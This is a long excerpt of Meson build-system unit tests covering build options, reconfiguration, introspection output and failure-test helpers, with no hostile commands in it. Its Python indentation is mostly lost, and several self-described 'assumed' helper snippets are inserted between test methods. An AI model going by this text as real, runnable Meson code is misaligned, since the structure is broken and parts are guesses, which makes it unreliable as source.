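assert shlex.split('-Dfoo -Dbar "-Dthird=one two"') == ['-Dfoo', '-Dbar', '-Dthird=one two']
assert shlex.split('"foo bar" one two') == ['foo bar', 'one', 'two']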
def test_warning_level_0(self):
testdir = os.path.join(self.common_test_dir, '214 warning level 0')
# Verify default values when passing no args
self.init(testdir)
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ --warnlevel
self.init(testdir, extra_args=['--warnlevel=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('--warnlevel=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
# verify we can override w/ -Dwarning_level
self.init(testdir, extra_args=['-Dwarning_level=1'])
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '1')
self.setconf('-Dwarning_level=0')
obj = mesonbuild.coredata.load(self.builddir)
self.assertEqual(obj.builtins['warning_level'].value, '0')
self.wipe()
def test_feature_check_usage_subprojects(self):
testdir = os.path.join(self.unit_test_dir, '41 featurenew subprojects')
out = self.init(testdir)
# Parent project warns correctly
self.assertRegex(out, "WARNING: Project targeting '>=0.45'.*'0.47.0': dict")
# Subprojects warn correctly
self.assertRegex(out, r"\|WARNING: Project targeting '>=0.40'.*'0.44.0': disabler")
self.assertRegex(out, r"\|WARNING: Project targeting '!=0.40'.*'0.44.0': disabler")
# Subproject has a new-enough meson_version, no warning
self.assertNotRegex(out, "WARNING: Project targeting.*Python")
# Ensure a summary is printed in the subproject and the outer project
self.assertRegex(out, r"\|WARNING: Project specifies a minimum meson_version '>=0.40'")
self.assertRegex(out, r"\| \* 0.44.0: {'disabler'}")
self.assertRegex(out, "WARNING: Project specifies a minimum meson_version '>=0.45'")
self.assertRegex(out, " * 0.47.0: {'dict'}")
def test_configure_file_warnings(self):
testdir = os.path.join(self.common_test_dir, "14 configure file")
out = self.init(testdir)
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*'FOO_BAR'.*nosubst-nocopy2.txt.in.*not present.*")
self.assertRegex(out, "WARNING:.*'empty'.*config.h.in.*not present.*")
self.assertRegex(out, "WARNING:.*empty configuration_data.*test.py.in")
# Warnings for configuration files that are overwritten.
self.assertRegex(out, "WARNING:.*\"double_output.txt\".*overwrites")
self.assertRegex(out, "WARNING:.*\"subdir.double_output2.txt\".*overwrites")
self.assertNotRegex(out, "WARNING:.*no_write_conflict.txt.*overwrites")
self.assertNotRegex(out, "WARNING:.*@BASENAME@.*overwrites")
self.assertRegex(out, "WARNING:.*\"sameafterbasename\".*overwrites")
# No warnings about empty configuration data objects passed to files with substitutions
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy1.txt.in")
self.assertNotRegex(out, "WARNING:.*empty configuration_data.*nosubst-nocopy2.txt.in")
with open(os.path.join(self.builddir, 'nosubst-nocopy1.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'/* #undef FOO_BAR */')
with open(os.path.join(self.builddir, 'nosubst-nocopy2.txt'), 'rb') as f:
self.assertEqual(f.read().strip(), b'')
self.assertRegex(out, r"DEPRECATION:.*\['array'\] is invalid.*dict")
def test_dirs(self):
with tempfile.TemporaryDirectory() as containing:
with tempfile.TemporaryDirectory(dir=containing) as srcdir:
mfile = os.path.join(srcdir, 'meson.build')
with open(mfile, 'w') as of:
    of.write("project('foobar', 'c')\n")
pc = subprocess.run(self.setup_command,
cwd=srcdir,
stdout=subprocess.PIPE,
stderr=subprocess.DEVNULL)
self.assertIn(b'Must specify at least one directory name', pc.stdout)
with tempfile.TemporaryDirectory(dir=srcdir) as builddir:
subprocess.run(self.setup_command,
check=True,
cwd=builddir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
def get_opts_as_dict(self):
result = {}
for i in self.introspect('--buildoptions'):
result[i['name']] = i['value']
return result
def test_buildtype_setting(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.setconf('-Ddebug=false')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['buildtype'], 'plain')
self.assertEqual(opts['optimization'], '0')
# Setting optimizations to 3 should cause buildtype
# to go to release mode.
self.setconf('-Doptimization=3')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'release')
self.assertEqual(opts['debug'], False)
self.assertEqual(opts['optimization'], '3')
# Going to debug build type should reset debugging
# and optimization
self.setconf('-Dbuildtype=debug')
opts = self.get_opts_as_dict()
self.assertEqual(opts['buildtype'], 'debug')
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '0')
# Command-line parsing of buildtype settings should be the same as
# setting with `meson configure`.
#
# Setting buildtype should set optimization/debug
self.new_builddir()
self.init(testdir, extra_args=['-Dbuildtype=debugoptimized'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting optimization/debug should set buildtype
self.new_builddir()
self.init(testdir, extra_args=['-Doptimization=2', '-Ddebug=true'])
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
# Setting both buildtype and debug on the command-line should work, and
# should warn not to do that. Also test that --debug is parsed as -Ddebug=true
self.new_builddir()
out = self.init(testdir, extra_args=['-Dbuildtype=debugoptimized', '--debug'])
self.assertRegex(out, 'Recommend using either.*buildtype.*debug.*redundant')
opts = self.get_opts_as_dict()
self.assertEqual(opts['debug'], True)
self.assertEqual(opts['optimization'], '2')
self.assertEqual(opts['buildtype'], 'debugoptimized')
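# The buildtype <-> (debug, optimization) pairs asserted in the test
# above, collected for reference (values taken from the assertions, not
# from meson's source):
BUILDTYPE_DEFAULTS = {
    'plain': (False, '0'),
    'debug': (True, '0'),
    'debugoptimized': (True, '2'),
    'release': (False, '3'),
}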
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_native_dep_pkgconfig(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = r'{0}'
[properties]
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig.py'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
@skipIfNoPkgconfig
@unittest.skipIf(is_windows(), 'Help needed with fixing this test on windows')
def test_pkg_config_libdir(self):
testdir = os.path.join(self.unit_test_dir,
'46 native dep pkgconfig var')
with tempfile.NamedTemporaryFile(mode='w', delete=False) as crossfile:
crossfile.write(textwrap.dedent(
'''[binaries]
pkgconfig = 'pkg-config'
[properties]
pkg_config_libdir = [r'{0}']
[host_machine]
system = 'linux'
cpu_family = 'arm'
cpu = 'armv7'
endian = 'little'
'''.format(os.path.join(testdir, 'cross_pkgconfig'))))
crossfile.flush()
self.meson_cross_file = crossfile.name
env = {'PKG_CONFIG_LIBDIR': os.path.join(testdir,
'native_pkgconfig')}
self.init(testdir, extra_args=['-Dstart_native=false'], override_envvars=env)
self.wipe()
self.init(testdir, extra_args=['-Dstart_native=true'], override_envvars=env)
def __reconfigure(self, change_minor=False):
# Set an older version to force a reconfigure from scratch
filename = os.path.join(self.privatedir, 'coredata.dat')
with open(filename, 'rb') as f:
obj = pickle.load(f)
if change_minor:
v = mesonbuild.coredata.version.split('.')
obj.version = '.'.join(v[0:2] + [str(int(v[2]) + 1)])
else:
obj.version = '0.47.0'
with open(filename, 'wb') as f:
pickle.dump(obj, f)
def test_reconfigure(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure()
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
# Create a file in builddir and verify wipe command removes it
filename = os.path.join(self.builddir, 'something')
open(filename, 'w').close()
self.assertTrue(os.path.exists(filename))
out = self.init(testdir, extra_args=['--wipe', '-Dopt4=val4'])
self.assertFalse(os.path.exists(filename))
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 val4')
self.build()
self.run_tests()
def test_wipe_from_builddir(self):
testdir = os.path.join(self.common_test_dir, '161 custom target subdir depend files')
self.init(testdir)
self.__reconfigure()
# pathlib.Path is not a chdir context manager, so change directory
# explicitly to ensure --wipe really runs from inside the build directory.
prevdir = os.getcwd()
os.chdir(self.builddir)
try:
    self.init(testdir, extra_args=['--wipe'])
finally:
    os.chdir(prevdir)
def test_minor_version_does_not_reconfigure_wipe(self):
testdir = os.path.join(self.unit_test_dir, '48 reconfigure')
self.init(testdir, extra_args=['-Dopt1=val1'])
self.setconf('-Dopt2=val2')
self.__reconfigure(change_minor=True)
out = self.init(testdir, extra_args=['--reconfigure', '-Dopt3=val3'])
self.assertNotRegex(out, 'WARNING:.*Regenerating configuration from scratch')
self.assertRegex(out, 'opt1 val1')
self.assertRegex(out, 'opt2 val2')
self.assertRegex(out, 'opt3 val3')
self.assertRegex(out, 'opt4 default4')
self.build()
self.run_tests()
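# Together, test_reconfigure and test_minor_version_does_not_reconfigure_wipe
# pin down when coredata is regenerated from scratch: a change in the
# first two version components triggers it, a change in the last one
# does not. Sketch of that rule (assumed, not taken from meson's source):
def needs_regen_from_scratch(stored_version, current_version):
    return stored_version.split('.')[:2] != current_version.split('.')[:2]

assert needs_regen_from_scratch('0.47.0', '0.55.0') is True
assert needs_regen_from_scratch('0.55.0', '0.55.1') is False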
def test_target_construct_id_from_path(self):
# This ID is stable but not guessable. The test is meant to catch
# unintentional changes to target ID generation.
target_id = Target.construct_id_from_path('some/obscure/subdir',
'target-id', '@suffix')
self.assertEqual('5e002d3@@target-id@suffix', target_id)
target_id = Target.construct_id_from_path('subproject/foo/subdir/bar',
'target2-id', '@other')
self.assertEqual('81d46d1@@target2-id@other', target_id)
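# A hedged reconstruction of the ID scheme the expected values above
# imply: a 7-hex-char digest of the subdir, '@@', the target name, then
# the suffix. That the digest is sha1 is an assumption here.
import hashlib

def sketch_construct_id(subdir, name, suffix):
    return hashlib.sha1(subdir.encode('utf-8')).hexdigest()[:7] + '@@' + name + suffix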
def test_introspect_projectinfo_without_configured_build(self):
testfile = os.path.join(self.common_test_dir, '35 run program', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'run command')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '43 options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'options')
self.assertEqual(res['subprojects'], [])
testfile = os.path.join(self.common_test_dir, '46 subproject options', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(set(res['buildsystem_files']), set(['meson_options.txt', 'meson.build']))
self.assertEqual(res['version'], 'undefined')
self.assertEqual(res['descriptive_name'], 'suboptions')
self.assertEqual(len(res['subprojects']), 1)
subproject_files = set(f.replace('\\', '/') for f in res['subprojects'][0]['buildsystem_files'])
self.assertEqual(subproject_files, set(['subprojects/subproject/meson_options.txt', 'subprojects/subproject/meson.build']))
self.assertEqual(res['subprojects'][0]['name'], 'subproject')
self.assertEqual(res['subprojects'][0]['version'], 'undefined')
self.assertEqual(res['subprojects'][0]['descriptive_name'], 'subproject')
def test_introspect_projectinfo_subprojects(self):
testdir = os.path.join(self.common_test_dir, '102 subproject subdir')
self.init(testdir)
res = self.introspect('--projectinfo')
expected = {
'descriptive_name': 'proj',
'version': 'undefined',
'subproject_dir': 'subprojects',
'subprojects': [
{
'descriptive_name': 'sub',
'name': 'sub',
'version': '1.0'
},
{
'descriptive_name': 'sub-novar',
'name': 'sub_novar',
'version': '1.0',
},
]
}
res['subprojects'] = sorted(res['subprojects'], key=lambda i: i['name'])
self.assertDictEqual(expected, res)
def test_introspection_target_subproject(self):
testdir = os.path.join(self.common_test_dir, '45 subproject')
self.init(testdir)
res = self.introspect('--targets')
expected = {
'sublib': 'sublib',
'simpletest': 'sublib',
'user': None
}
for entry in res:
name = entry['name']
self.assertEqual(entry['subproject'], expected[name])
def test_introspect_projectinfo_subproject_dir(self):
testdir = os.path.join(self.common_test_dir, '78 custom subproject dir')
self.init(testdir)
res = self.introspect('--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
def test_introspect_projectinfo_subproject_dir_from_source(self):
testfile = os.path.join(self.common_test_dir, '78 custom subproject dir', 'meson.build')
res = self.introspect_directory(testfile, '--projectinfo')
self.assertEqual(res['subproject_dir'], 'custom_subproject_dir')
@skipIfNoExecutable('clang-format')
def test_clang_format(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-format is for now only supported on Ninja, not {}'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '54 clang-format')
testfile = os.path.join(testdir, 'prog.c')
badfile = os.path.join(testdir, 'prog_orig_c')
goodfile = os.path.join(testdir, 'prog_expected_c')
testheader = os.path.join(testdir, 'header.h')
badheader = os.path.join(testdir, 'header_orig_h')
goodheader = os.path.join(testdir, 'header_expected_h')
try:
shutil.copyfile(badfile, testfile)
shutil.copyfile(badheader, testheader)
self.init(testdir)
self.assertNotEqual(Path(testfile).read_text(),
Path(goodfile).read_text())
self.assertNotEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
self.run_target('clang-format')
self.assertEqual(Path(testheader).read_text(),
Path(goodheader).read_text())
finally:
if os.path.exists(testfile):
os.unlink(testfile)
if os.path.exists(testheader):
os.unlink(testheader)
@skipIfNoExecutable('clang-tidy')
def test_clang_tidy(self):
if self.backend is not Backend.ninja:
raise unittest.SkipTest('Clang-tidy is for now only supported on Ninja, not {}'.format(self.backend.name))
if shutil.which('c++') is None:
raise unittest.SkipTest('Clang-tidy breaks when ccache is used and "c++" not in path.')
if is_osx():
raise unittest.SkipTest('Apple ships a broken clang-tidy that chokes on -pipe.')
testdir = os.path.join(self.unit_test_dir, '70 clang-tidy')
self.init(testdir, override_envvars={'CXX': 'c++'})
out = self.run_target('clang-tidy')
self.assertIn('cttest.cpp:4:20', out)
def test_identity_cross(self):
testdir = os.path.join(self.unit_test_dir, '71 cross')
# Do a build to generate a cross file where the host is this target
self.init(testdir, extra_args=['-Dgenerate=true'])
self.meson_cross_file = os.path.join(self.builddir, "crossfile")
self.assertTrue(os.path.exists(self.meson_cross_file))
# Now verify that this is detected as cross
self.new_builddir()
self.init(testdir)
def test_introspect_buildoptions_without_configured_build(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--buildoptions'] + self.meson_args)
self.init(testdir, default_args=False)
res_wb = self.introspect('--buildoptions')
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_meson_configure_from_source_does_not_crash(self):
testdir = os.path.join(self.unit_test_dir, '59 introspect buildoptions')
self._run(self.mconf_command + [testdir])
def test_introspect_json_dump(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
def assertKeyTypes(key_type_list, obj):
for i in key_type_list:
self.assertIn(i[0], obj)
self.assertIsInstance(obj[i[0]], i[1])
root_keylist = [
('benchmarks', list),
('buildoptions', list),
('buildsystem_files', list),
('dependencies', list),
('installed', dict),
('projectinfo', dict),
('targets', list),
('tests', list),
]
test_keylist = [
('cmd', list),
('env', dict),
('name', str),
('timeout', int),
('suite', list),
('is_parallel', bool),
('protocol', str),
]
buildoptions_keylist = [
('name', str),
('section', str),
('type', str),
('description', str),
('machine', str),
]
buildoptions_typelist = [
('combo', str, [('choices', list)]),
('string', str, []),
('boolean', bool, []),
('integer', int, []),
('array', list, []),
]
buildoptions_sections = ['core', 'backend', 'base', 'compiler', 'directory', 'user', 'test']
buildoptions_machines = ['any', 'build', 'host']
dependencies_typelist = [
('name', str),
('version', str),
('compile_args', list),
('link_args', list),
]
targets_typelist = [
('name', str),
('id', str),
('type', str),
('defined_in', str),
('filename', list),
('build_by_default', bool),
('target_sources', list),
('installed', bool),
]
targets_sources_typelist = [
('language', str),
('compiler', list),
('parameters', list),
('sources', list),
('generated_sources', list),
]
# First load all files
res = {}
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i[0]))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res[i[0]] = json.load(fp)
assertKeyTypes(root_keylist, res)
# Check Tests and benchmarks
tests_to_find = ['test case 1', 'test case 2', 'benchmark 1']
for i in res['benchmarks'] + res['tests']:
assertKeyTypes(test_keylist, i)
if i['name'] in tests_to_find:
tests_to_find.remove(i['name'])
self.assertListEqual(tests_to_find, [])
# Check buildoptions
buildopts_to_find = {'cpp_std': 'c++11'}
for i in res['buildoptions']:
assertKeyTypes(buildoptions_keylist, i)
valid_type = False
for j in buildoptions_typelist:
if i['type'] == j[0]:
self.assertIsInstance(i['value'], j[1])
assertKeyTypes(j[2], i)
valid_type = True
break
self.assertIn(i['section'], buildoptions_sections)
self.assertIn(i['machine'], buildoptions_machines)
self.assertTrue(valid_type)
if i['name'] in buildopts_to_find:
self.assertEqual(i['value'], buildopts_to_find[i['name']])
buildopts_to_find.pop(i['name'], None)
self.assertDictEqual(buildopts_to_find, {})
# Check buildsystem_files
bs_files = ['meson.build', 'meson_options.txt', 'sharedlib/meson.build', 'staticlib/meson.build']
bs_files = [os.path.join(testdir, x) for x in bs_files]
self.assertPathListEqual(list(sorted(res['buildsystem_files'])), list(sorted(bs_files)))
# Check dependencies
dependencies_to_find = ['threads']
for i in res['dependencies']:
assertKeyTypes(dependencies_typelist, i)
if i['name'] in dependencies_to_find:
dependencies_to_find.remove(i['name'])
self.assertListEqual(dependencies_to_find, [])
# Check projectinfo
self.assertDictEqual(res['projectinfo'], {'version': '1.2.3', 'descriptive_name': 'introspection', 'subproject_dir': 'subprojects', 'subprojects': []})
# Check targets
targets_to_find = {
'sharedTestLib': ('shared library', True, False, 'sharedlib/meson.build'),
'staticTestLib': ('static library', True, False, 'staticlib/meson.build'),
'test1': ('executable', True, True, 'meson.build'),
'test2': ('executable', True, False, 'meson.build'),
'test3': ('executable', True, False, 'meson.build'),
}
for i in res['targets']:
assertKeyTypes(targets_typelist, i)
if i['name'] in targets_to_find:
tgt = targets_to_find[i['name']]
self.assertEqual(i['type'], tgt[0])
self.assertEqual(i['build_by_default'], tgt[1])
self.assertEqual(i['installed'], tgt[2])
self.assertPathEqual(i['defined_in'], os.path.join(testdir, tgt[3]))
targets_to_find.pop(i['name'], None)
for j in i['target_sources']:
assertKeyTypes(targets_sources_typelist, j)
self.assertDictEqual(targets_to_find, {})
def test_introspect_file_dump_equals_all(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
self.init(testdir)
res_all = self.introspect('--all')
res_file = {}
root_keylist = [
'benchmarks',
'buildoptions',
'buildsystem_files',
'dependencies',
'installed',
'projectinfo',
'targets',
'tests',
]
infodir = os.path.join(self.builddir, 'meson-info')
self.assertPathExists(infodir)
for i in root_keylist:
curr = os.path.join(infodir, 'intro-{}.json'.format(i))
self.assertPathExists(curr)
with open(curr, 'r') as fp:
res_file[i] = json.load(fp)
self.assertEqual(res_all, res_file)
def test_introspect_meson_info(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'meson-info.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
for i in ['meson_version', 'directories', 'introspection', 'build_files_updated', 'error']:
self.assertIn(i, res1)
self.assertEqual(res1['error'], False)
self.assertEqual(res1['build_files_updated'], True)
def test_introspect_config_update(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-buildoptions.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res1 = json.load(fp)
self.setconf('-Dcpp_std=c++14')
self.setconf('-Dbuildtype=release')
for idx, i in enumerate(res1):
if i['name'] == 'cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'build.cpp_std':
res1[idx]['value'] = 'c++14'
if i['name'] == 'buildtype':
res1[idx]['value'] = 'release'
if i['name'] == 'optimization':
res1[idx]['value'] = '3'
if i['name'] == 'debug':
res1[idx]['value'] = False
with open(introfile, 'r') as fp:
res2 = json.load(fp)
self.assertListEqual(res1, res2)
def test_introspect_targets_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
introfile = os.path.join(self.builddir, 'meson-info', 'intro-targets.json')
self.init(testdir)
self.assertPathExists(introfile)
with open(introfile, 'r') as fp:
res_wb = json.load(fp)
res_nb = self.introspect_directory(testfile, ['--targets'] + self.meson_args)
# Account for differences in output
for i in res_wb:
i['filename'] = [os.path.relpath(x, self.builddir) for x in i['filename']]
if 'install_filename' in i:
del i['install_filename']
sources = []
for j in i['target_sources']:
sources += j['sources']
i['target_sources'] = [{
'language': 'unknown',
'compiler': [],
'parameters': [],
'sources': sources,
'generated_sources': []
}]
self.maxDiff = None
self.assertListEqual(res_nb, res_wb)
def test_introspect_dependencies_from_source(self):
testdir = os.path.join(self.unit_test_dir, '57 introspection')
testfile = os.path.join(testdir, 'meson.build')
res_nb = self.introspect_directory(testfile, ['--scan-dependencies'] + self.meson_args)
expected = [
{
'name': 'threads',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'zlib',
'required': False,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'bugDep1',
'required': True,
'version': [],
'has_fallback': False,
'conditional': False
},
{
'name': 'somethingthatdoesnotexist',
'required': True,
'version': ['>=1.2.3'],
'has_fallback': False,
'conditional': True
},
{
'name': 'look_i_have_a_fallback',
'required': True,
'version': ['>=1.0.0', '<=99.9.9'],
'has_fallback': True,
'conditional': True
}
]
self.maxDiff = None
self.assertListEqual(res_nb, expected)
def test_unstable_coredata(self):
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
# just test that the command does not fail (e.g. because it throws an exception)
self._run([*self.meson_command, 'unstable-coredata', self.builddir])
@skip_if_no_cmake
def test_cmake_prefix_path(self):
testdir = os.path.join(self.unit_test_dir, '64 cmake_prefix_path')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
@skip_if_no_cmake
def test_cmake_parser(self):
testdir = os.path.join(self.unit_test_dir, '65 cmake parser')
self.init(testdir, extra_args=['-Dcmake_prefix_path=' + os.path.join(testdir, 'prefix')])
def test_alias_target(self):
if self.backend is Backend.vs:
# FIXME: This unit test is broken with vs backend, needs investigation
raise unittest.SkipTest('Skipping alias_target test with {} backend'.format(self.backend.name))
testdir = os.path.join(self.unit_test_dir, '66 alias target')
self.init(testdir)
self.build()
self.assertPathDoesNotExist(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathDoesNotExist(os.path.join(self.builddir, 'hello.txt'))
self.run_target('build-all')
self.assertPathExists(os.path.join(self.builddir, 'prog' + exe_suffix))
self.assertPathExists(os.path.join(self.builddir, 'hello.txt'))
def test_configure(self):
testdir = os.path.join(self.common_test_dir, '2 cpp')
self.init(testdir)
self._run(self.mconf_command + [self.builddir])
def test_summary(self):
testdir = os.path.join(self.unit_test_dir, '72 summary')
out = self.init(testdir)
expected = textwrap.dedent(r'''
Some Subproject 2.0
string: bar
integer: 1
boolean: True
My Project 1.0
Configuration
Some boolean: False
Another boolean: True
Some string: Hello World
A list: string
1
True
empty list:
A number: 1
yes: YES
no: NO
coma list: a, b, c
Subprojects
sub: YES
sub2: NO Problem encountered: This subproject failed
''')
expected_lines = expected.split('\n')[1:]
out_start = out.find(expected_lines[0])
out_lines = out[out_start:].split('\n')[:len(expected_lines)]
if sys.version_info < (3, 7, 0):
# Dictionary order is not stable in Python <3.7, so sort the lines
# while comparing
self.assertEqual(sorted(expected_lines), sorted(out_lines))
else:
self.assertEqual(expected_lines, out_lines)
def test_meson_compile(self):
"""Test the meson compile command."""
prog = 'trivialprog'
if is_windows():
prog = '{}.exe'.format(prog)
testdir = os.path.join(self.common_test_dir, '1 trivial')
self.init(testdir)
self._run([*self.meson_command, 'compile', '-C', self.builddir])
# If compile worked then we should get a program
self.assertPathExists(os.path.join(self.builddir, prog))
self._run([*self.meson_command, 'compile', '-C', self.builddir, '--clean'])
self.assertPathDoesNotExist(os.path.join(self.builddir, prog))
def test_spurious_reconfigure_built_dep_file(self):
testdir = os.path.join(self.unit_test_dir, '74 dep files')
# Regression test: a spurious reconfigure was happening when the build
# directory was inside the source directory.
# See https://gitlab.freedesktop.org/gstreamer/gst-build/-/issues/85.
srcdir = os.path.join(self.builddir, 'srctree')
shutil.copytree(testdir, srcdir)
builddir = os.path.join(srcdir, '_build')
self.change_builddir(builddir)
self.init(srcdir)
self.build()
# During the first configure the file did not exist, so no dependency
# should have been set. A rebuild should not trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
self.init(srcdir, extra_args=['--reconfigure'])
# During the reconfigure the file did exist, but it is inside the build
# directory, so no dependency should have been set. A rebuild should not
# trigger a reconfigure.
self.clean()
out = self.build()
self.assertNotIn('Project configured', out)
def _test_junit(self, case: str) -> None:
try:
import lxml.etree as et
except ImportError:
raise unittest.SkipTest('lxml required, but not found.')
schema = et.XMLSchema(et.parse(str(Path(__file__).parent / 'data' / 'schema.xsd')))
self.init(case)
self.run_tests()
junit = et.parse(str(Path(self.builddir) / 'meson-logs' / 'testlog.junit.xml'))
try:
schema.assertValid(junit)
except et.DocumentInvalid as e:
self.fail(e.error_log)
def test_junit_valid_tap(self):
self._test_junit(os.path.join(self.common_test_dir, '213 tap tests'))
def test_junit_valid_exitcode(self):
self._test_junit(os.path.join(self.common_test_dir, '44 test args'))
def test_junit_valid_gtest(self):
self._test_junit(os.path.join(self.framework_test_dir, '2 gtest'))
def test_link_language_linker(self):
# TODO: there should be some way to query how we're linking things
# without resorting to reading the ninja.build file
if self.backend is not Backend.ninja:
raise unittest.SkipTest('This test reads the ninja file')
testdir = os.path.join(self.common_test_dir, '232 link language')
self.init(testdir)
build_ninja = os.path.join(self.builddir, 'build.ninja')
with open(build_ninja, 'r', encoding='utf-8') as f:
contents = f.read()
self.assertRegex(contents, r'build main(\.exe)?.*: c_LINKER')
self.assertRegex(contents, r'build (lib|cyg)?mylib.*: c_LINKER')
class FailureTests(BasePlatformTests):
'''
Tests that test failure conditions. Build files here should be dynamically
generated and static tests should go into `test cases/failing*`.
This is useful because there can be many ways in which a particular
function can fail, and creating failing tests for all of them is tedious
and slows down testing.
'''
dnf = "[Dd]ependency.*not found(:.*)?"
nopkg = '[Pp]kg-config.*not found'
def setUp(self):
super().setUp()
self.srcdir = os.path.realpath(tempfile.mkdtemp())
self.mbuild = os.path.join(self.srcdir, 'meson.build')
self.moptions = os.path.join(self.srcdir, 'meson_options.txt')
def tearDown(self):
super().tearDown()
windows_proof_rmtree(self.srcdir)
def assertMesonRaises(self, contents, match, *,
extra_args=None,
langs=None,
meson_version=None,
options=None,
override_envvars=None):
'''
Assert that running meson configure on the specified @contents raises
an error message matching regex @match.
'''
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('failure test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
if options is not None:
with open(self.moptions, 'w') as f:
f.write(options)
o = {'MESON_FORCE_BACKTRACE': '1'}
if override_envvars is None:
override_envvars = o
else:
override_envvars.update(o)
# Force tracebacks so we can detect them properly
with self.assertRaisesRegex(MesonException, match, msg=contents):
# Must run in-process or we'll get a generic CalledProcessError
self.init(self.srcdir, extra_args=extra_args,
inprocess=True,
override_envvars = override_envvars)
def obtainMesonOutput(self, contents, match, extra_args, langs, meson_version=None):
if langs is None:
langs = []
with open(self.mbuild, 'w') as f:
f.write("project('output test', 'c', 'cpp'")
if meson_version:
f.write(", meson_version: '{}'".format(meson_version))
f.write(")\n")
for lang in langs:
f.write("add_languages('{}', required : false)\n".format(lang))
f.write(contents)
# Run in-process for speed and consistency with assertMesonRaises
return self.init(self.srcdir, extra_args=extra_args, inprocess=True)
def assertMesonOutputs(self, contents, match, extra_args=None, langs=None, meson_version=None):
'''
Assert that running meson configure on the specified @contents outputs
something that matches regex @match.
'''
out = self.obtainMesonOutput(contents, match, extra_args, langs, meson_version)
self.assertRegex(out, match)
